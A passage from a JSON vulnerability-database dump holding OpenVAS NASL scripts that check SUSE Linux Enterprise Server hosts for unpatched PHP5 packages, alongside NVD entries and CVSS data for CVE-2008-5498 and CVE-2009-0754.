http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"apache2-mod_php5\", rpm:\"apache2-mod_php5~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5\", rpm:\"php5~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-bcmath\", rpm:\"php5-bcmath~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-bz2\", rpm:\"php5-bz2~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-calendar\", rpm:\"php5-calendar~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-ctype\", rpm:\"php5-ctype~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-curl\", rpm:\"php5-curl~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-dba\", rpm:\"php5-dba~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-dbase\", rpm:\"php5-dbase~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-devel\", rpm:\"php5-devel~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-dom\", rpm:\"php5-dom~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-exif\", rpm:\"php5-exif~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-fastcgi\", rpm:\"php5-fastcgi~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-ftp\", rpm:\"php5-ftp~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-gd\", rpm:\"php5-gd~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-gettext\", rpm:\"php5-gettext~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-gmp\", rpm:\"php5-gmp~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-iconv\", rpm:\"php5-iconv~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-imap\", rpm:\"php5-imap~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-json\", rpm:\"php5-json~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-ldap\", rpm:\"php5-ldap~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-mbstring\", rpm:\"php5-mbstring~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-mcrypt\", rpm:\"php5-mcrypt~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-mhash\", rpm:\"php5-mhash~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-mysql\", rpm:\"php5-mysql~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-ncurses\", rpm:\"php5-ncurses~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-odbc\", rpm:\"php5-odbc~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-openssl\", rpm:\"php5-openssl~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-pcntl\", rpm:\"php5-pcntl~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-pdo\", rpm:\"php5-pdo~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-pear\", rpm:\"php5-pear~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-pgsql\", rpm:\"php5-pgsql~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-posix\", rpm:\"php5-posix~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-pspell\", rpm:\"php5-pspell~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-shmop\", rpm:\"php5-shmop~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-snmp\", rpm:\"php5-snmp~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-soap\", rpm:\"php5-soap~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-sockets\", rpm:\"php5-sockets~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-sqlite\", rpm:\"php5-sqlite~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-suhosin\", rpm:\"php5-suhosin~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-sysvmsg\", rpm:\"php5-sysvmsg~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-sysvsem\", rpm:\"php5-sysvsem~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-sysvshm\", rpm:\"php5-sysvshm~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-tokenizer\", rpm:\"php5-tokenizer~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-wddx\", rpm:\"php5-wddx~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-xmlreader\", rpm:\"php5-xmlreader~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-xmlrpc\", rpm:\"php5-xmlrpc~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-xsl\", rpm:\"php5-xsl~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-zlib\", rpm:\"php5-zlib~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "pluginID": "65786", "hash": "4c7028d803f94b85b6716cdcf998221f403f0197cca3ce670bd4134afa850458", "references": [], "edition": 2, "cvelist": ["CVE-2009-0754", "CVE-2008-5498"], "lastseen": "2017-07-26T08:55:58", "viewCount": 2, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2008-5498", "CVE-2009-0754"]}, {"type": "openvas", "idList": ["OPENVAS:136141256231065637", "OPENVAS:136141256231065786", "OPENVAS:65637", "OPENVAS:136141256231063755", "OPENVAS:1361412562310880938", "OPENVAS:880871", "OPENVAS:63827", "OPENVAS:63755", "OPENVAS:136141256231063827", "OPENVAS:1361412562310880871"]}, {"type": "nessus", "idList": ["SUSE_11_APACHE2-MOD_PHP5-090319.NASL", "SUSE_11_0_APACHE2-MOD_PHP5-090312.NASL", "SUSE_11_1_APACHE2-MOD_PHP5-090312.NASL", "SUSE_APACHE2-MOD_PHP5-6069.NASL", "SUSE_APACHE2-MOD_PHP5-6068.NASL", "ORACLELINUX_ELSA-2009-0337.NASL", "REDHAT-RHSA-2009-0337.NASL", "CENTOS_RHSA-2009-0337.NASL", "FREEBSD_PKG_58A3C266DB0111DDAE30001CC0377035.NASL", "SLACKWARE_SSA_2009-098-02.NASL"]}, {"type": "redhat", "idList": ["RHSA-2009:0337", "RHSA-2009:0338", "RHSA-2009:0350"]}, {"type": "oraclelinux", "idList": ["ELSA-2009-0337", "ELSA-2009-0338"]}, {"type": "centos", "idList": ["CESA-2009:0337", "CESA-2009:0338"]}, {"type": "seebug", "idList": ["SSV:66122", "SSV:10377", "SSV:4604", "SSV:15209"]}, {"type": "exploitdb", "idList": ["EDB-ID:7646", "EDB-ID:32769"]}, {"type": "freebsd", "idList": ["58A3C266-DB01-11DD-AE30-001CC0377035"]}, {"type": "slackware", "idList": ["SSA-2009-098-02"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:21425", "SECURITYVULNS:VULN:9711"]}, {"type": "ubuntu", "idList": ["USN-761-1"]}, {"type": "debian", "idList": ["DEBIAN:DSA-1789-1:B5F1B"]}, {"type": "gentoo", "idList": ["GLSA-201001-03"]}], "modified": "2017-07-26T08:55:58"}, "vulnersScore": 7.5}, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cvelist", "hash": "e860654227fcd5593f826277c7bae8e9"}, {"key": "cvss", "hash": "a792e2393dff1e200b885c5245988f6f"}, {"key": "description", "hash": "7608ae0919cdf8dc8fedb799fb95bfaa"}, {"key": "href", "hash": "d35bec6bdce0a8e21568e089b3817eed"}, {"key": "modified", "hash": "bf6febede5ca68e35fdf4a0f47b4ef18"}, {"key": "naslFamily", "hash": "71a40666da62ba38d22539c8277870c7"}, {"key": "pluginID", "hash": "3a1eda493fe218efb088d6019dc86c58"}, {"key": "published", "hash": "ddca62dcc15ed77d339ae90bcf0f3da3"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "b778055b37159119ce97e96620d4ff56"}, {"key": "sourceData", "hash": "54cdb68b27325372586a31ffeaab5c0e"}, {"key": "title", "hash": "b74b0a9c903004716c5482ee5468cbeb"}, {"key": "type", "hash": "47c1f692ea47a21f716dad07043ade01"}], "objectVersion": "1.3", "modified": "2017-07-11T00:00:00"}

{"cve": [{"lastseen": "2018-11-01T05:11:58", "bulletinFamily": "NVD", "description": "Array index error in the imageRotate function in PHP 5.2.8 and earlier allows context-dependent attackers to read the contents of arbitrary memory locations via a crafted value of the third argument (aka the bgd_color or clrBack argument) for an indexed image.", "modified": "2018-10-30T12:25:35", "published": "2008-12-26T15:30:00", "id": "CVE-2008-5498", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-5498", "title": "CVE-2008-5498", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-10-04T11:17:14", "bulletinFamily": "NVD", "description": "PHP 4.4.4, 5.1.6, and other versions, when running on Apache, allows local users to modify behavior of other sites hosted on the same web server by modifying the mbstring.func_overload setting within .htaccess, which causes this setting to be applied to other virtual hosts on the same server.", "modified": "2018-10-03T17:58:38", "published": "2009-03-03T11:30:05", "id": "CVE-2009-0754", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0754", "title": "CVE-2009-0754", "type": "cve", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "openvas": [{"lastseen": "2018-04-06T11:38:04", "bulletinFamily": "scanner", "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n apache2-mod_php5\n php5\n php5-bcmath\n php5-bz2\n php5-calendar\n php5-ctype\n php5-curl\n php5-dba\n php5-dbase\n php5-dom\n php5-exif\n php5-fastcgi\n php5-ftp\n php5-gd\n php5-gettext\n php5-gmp\n php5-hash\n php5-iconv\n php5-json\n php5-ldap\n php5-mbstring\n php5-mcrypt\n php5-mysql\n php5-odbc\n php5-openssl\n php5-pcntl\n php5-pdo\n php5-pear\n php5-pgsql\n php5-pspell\n php5-shmop\n php5-snmp\n php5-soap\n php5-suhosin\n php5-sysvmsg\n php5-sysvsem\n php5-sysvshm\n php5-tokenizer\n php5-wddx\n php5-xmlreader\n php5-xmlrpc\n php5-xmlwriter\n php5-xsl\n php5-zip\n php5-zlib\n\n\nMore details may also be found by searching for the SuSE\nEnterprise Server 11 patch database located at\nhttp://download.novell.com/patch/finder/", "modified": "2018-04-06T00:00:00", "published": "2009-10-11T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231065637", "id": "OPENVAS:136141256231065637", "type": "openvas", "title": "SLES11: Security update for PHP5", "sourceData": "#\n#VID d121477dd9cc7bfeaa1d7d8a6d824fa0\n# OpenVAS Vulnerability Test\n# $\n# Description: Security update for PHP5\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n apache2-mod_php5\n php5\n php5-bcmath\n php5-bz2\n php5-calendar\n php5-ctype\n php5-curl\n php5-dba\n php5-dbase\n php5-dom\n php5-exif\n php5-fastcgi\n php5-ftp\n php5-gd\n php5-gettext\n php5-gmp\n php5-hash\n php5-iconv\n php5-json\n php5-ldap\n php5-mbstring\n php5-mcrypt\n php5-mysql\n php5-odbc\n php5-openssl\n php5-pcntl\n php5-pdo\n php5-pear\n php5-pgsql\n php5-pspell\n php5-shmop\n php5-snmp\n php5-soap\n php5-suhosin\n php5-sysvmsg\n php5-sysvsem\n php5-sysvshm\n php5-tokenizer\n php5-wddx\n php5-xmlreader\n php5-xmlrpc\n php5-xmlwriter\n php5-xsl\n php5-zip\n php5-zlib\n\n\nMore details may also be found by searching for the SuSE\nEnterprise Server 11 patch database located at\nhttp://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://bugzilla.novell.com/show_bug.cgi?id=480948\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.novell.com/show_bug.cgi?id=471419\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.65637\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-11 22:58:51 +0200 (Sun, 11 Oct 2009)\");\n script_cve_id(\"CVE-2008-5498\", \"CVE-2009-0754\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_name(\"SLES11: Security update for PHP5\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"apache2-mod_php5\", rpm:\"apache2-mod_php5~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5\", rpm:\"php5~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-bcmath\", rpm:\"php5-bcmath~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-bz2\", rpm:\"php5-bz2~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-calendar\", rpm:\"php5-calendar~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-ctype\", rpm:\"php5-ctype~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-curl\", rpm:\"php5-curl~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-dba\", rpm:\"php5-dba~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-dbase\", rpm:\"php5-dbase~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-dom\", rpm:\"php5-dom~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-exif\", rpm:\"php5-exif~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-fastcgi\", rpm:\"php5-fastcgi~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-ftp\", rpm:\"php5-ftp~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-gd\", rpm:\"php5-gd~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-gettext\", rpm:\"php5-gettext~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-gmp\", rpm:\"php5-gmp~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-hash\", rpm:\"php5-hash~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-iconv\", rpm:\"php5-iconv~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-json\", rpm:\"php5-json~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-ldap\", rpm:\"php5-ldap~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-mbstring\", rpm:\"php5-mbstring~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-mcrypt\", rpm:\"php5-mcrypt~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-mysql\", rpm:\"php5-mysql~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-odbc\", rpm:\"php5-odbc~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-openssl\", rpm:\"php5-openssl~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-pcntl\", rpm:\"php5-pcntl~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-pdo\", rpm:\"php5-pdo~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-pear\", rpm:\"php5-pear~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-pgsql\", rpm:\"php5-pgsql~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-pspell\", rpm:\"php5-pspell~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-shmop\", rpm:\"php5-shmop~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-snmp\", rpm:\"php5-snmp~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-soap\", rpm:\"php5-soap~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-suhosin\", rpm:\"php5-suhosin~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-sysvmsg\", rpm:\"php5-sysvmsg~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-sysvsem\", rpm:\"php5-sysvsem~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-sysvshm\", rpm:\"php5-sysvshm~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-tokenizer\", rpm:\"php5-tokenizer~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-wddx\", rpm:\"php5-wddx~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-xmlreader\", rpm:\"php5-xmlreader~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-xmlrpc\", rpm:\"php5-xmlrpc~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-xmlwriter\", rpm:\"php5-xmlwriter~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-xsl\", rpm:\"php5-xsl~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-zip\", rpm:\"php5-zip~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-zlib\", rpm:\"php5-zlib~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-04-06T11:39:32", "bulletinFamily": "scanner", "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n apache2-mod_php5\n php5\n php5-bcmath\n php5-bz2\n php5-calendar\n php5-ctype\n php5-curl\n php5-dba\n php5-dbase\n php5-devel\n php5-dom\n php5-exif\n php5-fastcgi\n php5-ftp\n php5-gd\n php5-gettext\n php5-gmp\n php5-iconv\n php5-imap\n php5-json\n php5-ldap\n php5-mbstring\n php5-mcrypt\n php5-mhash\n php5-mysql\n php5-ncurses\n php5-odbc\n php5-openssl\n php5-pcntl\n php5-pdo\n php5-pear\n php5-pgsql\n php5-posix\n php5-pspell\n php5-shmop\n php5-snmp\n php5-soap\n php5-sockets\n php5-sqlite\n php5-suhosin\n php5-sysvmsg\n php5-sysvsem\n php5-sysvshm\n php5-tokenizer\n php5-wddx\n php5-xmlreader\n php5-xmlrpc\n php5-xsl\n php5-zlib\n\n\nMore details may also be found by searching for the SuSE\nEnterprise Server 10 patch database located at\nhttp://download.novell.com/patch/finder/", "modified": "2018-04-06T00:00:00", "published": "2009-10-13T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231065786", "id": "OPENVAS:136141256231065786", "type": "openvas", "title": "SLES10: Security update for PHP5", "sourceData": "#\n#VID slesp2-apache2-mod_php5-6069\n# OpenVAS Vulnerability Test\n# $\n# Description: Security update for PHP5\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n apache2-mod_php5\n php5\n php5-bcmath\n php5-bz2\n php5-calendar\n php5-ctype\n php5-curl\n php5-dba\n php5-dbase\n php5-devel\n php5-dom\n php5-exif\n php5-fastcgi\n php5-ftp\n php5-gd\n php5-gettext\n php5-gmp\n php5-iconv\n php5-imap\n php5-json\n php5-ldap\n php5-mbstring\n php5-mcrypt\n php5-mhash\n php5-mysql\n php5-ncurses\n php5-odbc\n php5-openssl\n php5-pcntl\n php5-pdo\n php5-pear\n php5-pgsql\n php5-posix\n php5-pspell\n php5-shmop\n php5-snmp\n php5-soap\n php5-sockets\n php5-sqlite\n php5-suhosin\n php5-sysvmsg\n php5-sysvsem\n php5-sysvshm\n php5-tokenizer\n php5-wddx\n php5-xmlreader\n php5-xmlrpc\n php5-xsl\n php5-zlib\n\n\nMore details may also be found by searching for the SuSE\nEnterprise Server 10 patch database located at\nhttp://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.65786\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-13 18:25:40 +0200 (Tue, 13 Oct 2009)\");\n script_cve_id(\"CVE-2008-5498\", \"CVE-2009-0754\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n 